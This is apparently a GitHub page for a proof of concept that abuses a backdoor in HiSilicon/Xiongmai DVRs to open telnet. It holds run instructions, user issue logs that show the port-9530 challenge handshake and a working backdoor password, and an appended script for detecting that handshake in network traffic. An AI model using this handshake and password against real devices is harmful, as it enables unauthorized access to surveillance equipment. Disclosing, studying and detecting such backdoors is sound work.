
hs-dvr-telnet's Introduction

hs-dvr-telnet.py

Python implementation, using a slightly modified 3DES algorithm, for opening the telnet interface on HiSilicon DVR devices with the advanced (encrypted) command parser.

Joint work with Vladislav Yarmak (@snawoot).

Detailed analysis of this 0day backdoor by Vladislav is here:

https://habr.com/en/post/486856/

Recommended usage of this PoC:

git clone https://github.com/tothi/hs-dvr-telnet
cd hs-dvr-telnet
python -m venv venv
. ./venv/bin/activate
pip install -r requirements.txt
./hs-dvr-telnet.py

vendor(?) reply

Huawei/HiSilicon released a "this is not ours" Security Notice about the backdoor.

At the moment, it seems the affected part of the firmware is related to an OEM vendor (which is most likely Hangzhou Xiongmai Technology).

hs-dvr-telnet's Issues

EOF error with Hi3520D

When running the code on my Fisotech box, I get the following output:

[+] Opening connection to 192.168.1.30 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:96528459
[*] using password 2wj9fsa2
[*] initializing (modified) 3des with key 965284592wj9fsa2
[*] sending encrypted challenge 42:6F:3E:B9:8D:6A:01:EE:B6:62:FC:32:F8:6B:53:EC
[+] verify:OK
[*] sending encrypted command Telnet:OpenOnce...
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 54, in <module>
    dvrHelper.open_telnet(args.password)
  File "./hs-dvr-telnet.py", line 42, in open_telnet
    self.recvuntil("Open:")
  File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 310, in recvuntil
    res = self.recv(timeout=self.timeout)
  File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 82, in recv
    return self._recv(numb, timeout) or b''
  File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 160, in _recv
    if not self.buffer and not self._fillbuffer(timeout):
  File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 131, in _fillbuffer
    data = self.recv_raw(self.buffer.get_fill_size())
  File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/sock.py", line 56, in recv_raw
    raise EOFError
EOFError

Does that mean that my box is not vulnerable to this 0day?

Plugged in recent xiongmaitech releases...

I have an XM NVR with firmware "Build Date: 2020-09-12 15:59:39", and here's the portscan:

80/tcp    open  http
554/tcp   open  rtsp
12901/tcp open  unknown
23000/tcp open  inovaport1
30100/tcp open  rwp
34567/tcp open  dhanalakshmi

Which is of course only sad, as it complicates users' access to their devices...

doesn't work for me

Hello,

The PoC does not work on my xiongmaitech AHB7804R NVR (HiSilicon Hi3520) with the latest firmware (V3_V4.03.R11.7601).

When I run it I get:

(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[+] Opening connection to 192.168.1.24 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:34929138
[*] using password live3636
[*] initializing (modified) 3des with key 34929138live3636
[*] sending encrypted challenge 8B:CB:CB:2B:86:85:0A:8C:D7:99:AB:6D:B8:D8:55:E4
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 54, in <module>
    dvrHelper.open_telnet(args.password)
  File "./hs-dvr-telnet.py", line 37, in open_telnet
    assert self.recv(2) == b"OK"
AssertionError

And then the 9530 port closes (I don't see it anymore on nmap).
When I launch the script a second time I get:

(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[-] Opening connection to 192.168.1.24 on port 9530: Failed
[ERROR] Could not connect to 192.168.1.24 on port 9530
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 53, in <module>
    dvrHelper = DvrHelper(args.host, PORT)
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 75, in __init__
    self.sock   = self._connect(fam, typ)
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 115, in _connect
    self.error("Could not connect to %s on port %d" % (self.rhost, self.rport))
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/log.py", line 417, in error
    raise PwnlibException(message % args)
pwnlib.exception.PwnlibException: Could not connect to 192.168.1.24 on port 9530

Rebooting the NVR reopens the 9530 port.

Thank you
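
For monitoring a network that contains such devices, the plaintext messages visible in the transcripts above (OpenTelnet:OpenOnce, randNum:, verify:OK, Open:) can be tracked per connection on port 9530. The following is an added example, not part of the repository or of the issues; the packet-tuple input format, the function name and the sample capture are assumptions made for illustration.

```python
import re

BACKDOOR_PORT = 9530  # port shown in the PoC output on this page

# Plaintext markers from that output, in protocol order. Assumption: each one
# appears as ASCII somewhere in a TCP payload, whatever the framing around it.
STAGES = [
    ("request", "c2s", re.compile(rb"OpenTelnet:OpenOnce")),
    ("challenge", "s2c", re.compile(rb"randNum:\d+")),
    ("verified", "s2c", re.compile(rb"verify:OK")),
    ("opened", "s2c", re.compile(rb"Open:")),
]

def track_handshakes(packets):
    """packets: (src, sport, dst, dport, payload) tuples in capture order.
    Returns {(client, client_port, device): furthest stage reached}."""
    progress = {}  # flow -> number of stages seen so far, in order
    for src, sport, dst, dport, payload in packets:
        if dport == BACKDOOR_PORT:
            flow, direction = (src, sport, dst), "c2s"
        elif sport == BACKDOOR_PORT:
            flow, direction = (dst, dport, src), "s2c"
        else:
            continue  # marker strings on other ports are not this service
        idx = progress.get(flow, 0)
        # One segment may carry several markers, so keep advancing.
        while idx < len(STAGES):
            _, want_dir, pattern = STAGES[idx]
            if want_dir != direction or not pattern.search(payload):
                break
            idx += 1
        if idx:
            progress[flow] = idx
    return {flow: STAGES[n - 1][0] for flow, n in progress.items()}

# Constructed capture: device IPs and challenges mirror the transcripts above;
# the client address, client ports and opaque bytes are made up.
SAMPLE = [
    ("192.168.1.50", 40001, "192.168.1.30", 9530, b"OpenTelnet:OpenOnce"),
    ("192.168.1.30", 9530, "192.168.1.50", 40001, b"randNum:96528459"),
    ("192.168.1.50", 40001, "192.168.1.30", 9530, b"\x42\x6f\x3e\xb9"),
    ("192.168.1.30", 9530, "192.168.1.50", 40001, b"verify:OK"),
    ("192.168.1.50", 40002, "192.168.1.24", 9530, b"OpenTelnet:OpenOnce"),
    ("192.168.1.24", 9530, "192.168.1.50", 40002, b"randNum:34929138"),
    ("192.168.1.50", 40003, "192.168.1.24", 80, b"GET /OpenTelnet:OpenOnce"),
]

if __name__ == "__main__":
    for flow, stage in track_handshakes(SAMPLE).items():
        print(flow, "->", stage)
```

The stage names correspond to the PoC's own log lines: "verified" matches the "[+] verify:OK" line of the first transcript, and "challenge" is where the third transcript stopped.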
